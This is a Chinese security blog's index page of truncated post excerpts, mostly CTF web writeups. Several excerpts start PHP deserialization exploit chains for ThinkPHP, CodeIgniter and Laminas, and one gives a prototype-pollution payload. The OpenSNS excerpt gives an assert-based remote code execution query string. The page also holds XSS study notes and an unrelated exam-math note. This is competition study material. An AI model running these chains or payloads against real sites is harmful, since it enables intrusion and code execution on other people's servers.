2022CISCN国赛初赛Web-Crypto部分WriteUp
出题人不会出可以不出
Web手变成Crypto手,密码学大胜利
Webezpop扫目录发现源码www.zip,发现反序列化触发点
Thinkphp6.0.9反序列化复现及整合 - 先知社区 (aliyun.com)
网上的exp
123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990<?phpnamespace think { use think\route\Url; abstract class Model { private $lazySave; private $exists; protected $withEvent; protected $table; private ...
2021第五届蓝帽杯决赛Web-Imagecheck
WebImagecheckmd,这是拿着0day出题吗
ci框架的审计,通过反序列化可以写shell
通过gzip可以绕过phar的关键词检测
最终exp如下
123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566<?phpnamespace CodeIgniter\Cache\Handlers { class RedisHandler { public $redis; public function __construct($redis) { $this->redis = $redis; } }}namespace CodeIgniter\Session\Handlers { class RedisHandle ...
2022中国海洋大学校赛WriteUp
Web你比香农都牛逼直接看源码124.221.190.49/assets/index.9c4d6006.js
控制台运行:flag{blue-whalerdle}
very old php game
old php game
Baby Unserialize利用=&对变量进行引用
1234567891011121314151617181920212223242526272829303132<?phprequire_once "flag.php";class Foo{ private $i_am_flag; public $i_am_not_flag; public function __construct() { $this->i_am_not_flag =& $this->i_am_flag; } // public function __destruct() // { // // Yo ...
2022Pwnhub春季赛相关体验及wp
前言第一次参加Pwnhub举办的大型公开赛,体验良好。不愧是pwnhub,三个pwn到比赛结束就只有easyrop有四个解,膜拜pwn佬。前期比赛宣传的比较到位,pwnhub一直有举办公开月赛的传统,这次公开赛的规模更大,奖励也更加丰厚了。
比赛题目多种多样,各个方向的选手都能有题做,不只有传统的web、misc、crypto、re、pwn等,ACM、OCR、以及汇编等各种其他类型的题目都有涉及,甚至主办方还整了个网页版的传奇来玩,可以说是为了减少坐牢的枯燥而用心良苦了,希望各大线下比赛主办方都可以学习,题做不出来还能打打游戏(手动狗头)。
题目难度总体来说适中,pwn和misc偏难(长见识),种类多样的题目从多个方面考察了参赛选手的个人能力。
整个比赛流程下来,平台也十分流畅,靶机启动迅速,也没有限制靶机数量,后期靶机时间的限制也取消了,但美中不足的是,所有靶机都开放在同一个ip上,端口号可以遍历,再加上不是动态flag,这就可能导致蹭flag的情况出现。
WriteUpGaming头一次在ctf比赛中看到用flash游戏出的题目,感觉十分新奇,于是乎速速给我的虚拟机装上了flash ...
公考-资料分析
资料分析读题方法圈出重点关键词
时间(坑)
主题(萝卜) =》 找数据
考点,列式,计算
基本公式和常见概念现期量时间靠后的是先期
2021年工资:1200元
增长率20%
现期量 = 基期量 x(1 + 增长率)
基期量时间靠前的是基期
$\large 基期量=\frac{现期量}{1+增长率}$
增长量$\large 增长量 = 现期量 - 基期量 = 现期量 - \frac{现期量}{1+增长率} = \frac{现期量}{1+增长率} \times 增长率$
$\frac{现期量}{1+增长率} \times 增长率 = \frac{现期}{1+\frac{1}{n}}*\frac{1}{n} = \frac{现期}{n+1} $
记得正负号,增长率为负数的时候为:$ \frac{现期}{n-1} $
增加值不是增长量,可以认为是产值,就是个专有名词
变化量 = 增长量的绝对值
增长率
现期 1000元
2021年工资 :1200元
增长量 = 1200 - 10 ...
2022DASCTF三月月赛-WriteUp
就简单的做了做web
Webezpop源码
123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869<?phpclass crow{ public $v1; public $v2; function eval() { echo new $this->v1($this->v2); } public function __invoke() { $this->v1->world(); }}class fin{ public $f1; public function __destruct() { echo $this->f1 . '114514'; ...
2022红明谷杯web-WriteUp
好久没打比赛了,练练手
WebFan websiteZend FrameWork Pop Chain
Zend FrameWork Pop Chain - 先知社区 (aliyun.com)
有源码,发现是上面那条链子,用phar可以触发,有限制大小和检测文件头的部分,用垃圾数据和gzip压缩一下就能绕过
12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152<?phpnamespace Laminas\View\Resolver{ class TemplateMapResolver{ protected $map = ["setBody"=>"system"]; }}namespace Laminas\View\Renderer{ class PhpRenderer{ private $__he ...
2021 巅峰极客 Web Writeup
又复习了一遍python的pickle opcode,学到了不少新知识
WebEzjs随便登录进去,选择图片的地方可以读取源码
源码中可以看到使用了express-validator这个包,存在lodash < 4.17.17原型链污染
https://github.com/NeSE-Team/XNUCA2020Qualifier/blob/main/Web/oooooooldjs/writeup.md
https://paper.seebug.org/1426/#_1
需要注意的是,这里因为没有引入可以解析json的包,所以使用的payload跟文章中的有所区别
对文章中的payload进行删减,可以得到如下的payload:
"].__proto__["isadmin
再看源码的验证admin的位置
123456789if (req.session.isadmin !== "notadmin") { if (req.session.debug !== undefined && req.sessio ...
2021 红帽杯线下决赛部分wp
前两天重装系统忘了装go环境,绝了
Webopensns看日志,日志里有一条可疑的payload
12[ 2021-05-19T20:05:12+08:00 ] 127.0.0.1 /?s=weibo/share/shareBox&query=app=Common%26model=Schedule%26method=runSchedule%26id[method]=-%3E_validationFieldItem%26id[status]=1%26id[4]=function%26id[1]=assert%26id[args]=a=phpinfo()%26id[0]=aINFO: [ app_init ] --START--
打一下,发现出现phpinfo()界面
改一下payload
1/?s=weibo/share/shareBox&query=app=Common%26model=Schedule%26method=runSchedule%26id[method]=-%3E_validationFieldItem%26id[status]=1%26id[4 ...
XSS学习笔记--01
期末考试和在分局实习让我鸽了不少学习的计划这两天先补补基础知识,维持正常刷题就不错了,太忙了
XSS简介概述XSS-即Cross Site Scripting. 为了与”CSS”不混淆,故简称XSS.
XSS攻击指攻击者利用网站程序对用户的输入输出过滤不足,导致恶意代码在页面执行,对受害者造成cookie资料窃取、会话劫持、钓鱼欺骗等危害;
危害1.网络钓鱼,盗取各类用户的账号,如机器登录帐号、用户网银帐号、各类管理员帐号;
2.窃取用户Cookie,获取用户隐私,或者利用用户身份进一步执行操作
3.劫持用户(浏览器)会话,从而执行任意操作,例如进行非法转账、强制发表日志等
4.强制弹出广告页面,刷流量等
5..进行恶意操作,例如任意篡改页面信息,删除文章等,传播跨站脚本蠕虫,网页挂马等
6.进行基于大量的客户端攻击,如DDOS攻击
7.结合其它漏洞,如CSRF漏洞。
8.进一步渗透网站
9.获取客户端信息,例如用户的浏览历史、真实IP、开放端口、盗窃企业重要的具有商业价值的资料等;
10.控制受害者机器向其他网站发起攻击;
11传播跨站脚本蠕虫等;
类型xss攻击可以分成两种类型 ...